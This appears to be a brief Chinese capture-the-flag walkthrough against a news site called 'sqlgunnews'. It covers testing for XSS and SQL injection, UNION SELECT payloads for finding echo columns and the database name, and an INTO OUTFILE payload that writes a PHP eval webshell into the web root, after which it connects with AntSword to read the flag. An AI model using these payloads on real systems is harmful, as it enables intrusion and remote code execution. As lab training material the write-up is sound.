尝试在URL中测试一下sql注入，但是禁止注入

那么在输入框中测试一下xss,存在xss，那么极有可能如果存在sql注入在这里

在测试时，出现了这个搜索框的源代码，可以看出是单引号包含，所以可以测试闭合方式为单引号的sql注入

经测试，确实训在sql注入，闭合方式就是单引号

那么接下来测试回显点,得到2,3两个回显点

-1' union select 1,2,3#

爆数据库名,得到数据库名sqlgunnews

-1' union select 1,database(),3#

既然存在sql注入，那么我们可以尝试一下写入一句话木马进行测试

但是缺少绝对路径

我们对IP进行目录扫描一下看一下有什么可以用的

发现有一个phpinfo.php文件，访问一下

得到网站根目录/var/www/html

那接下来构造payload，将一句话木马写入根目录

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/zxin.php' #

访问zxin.php文件，我们的一句话木马就在进去了

 使用蚁剑谅连接一下，成功连接

 在根目录中可以找得到falg文件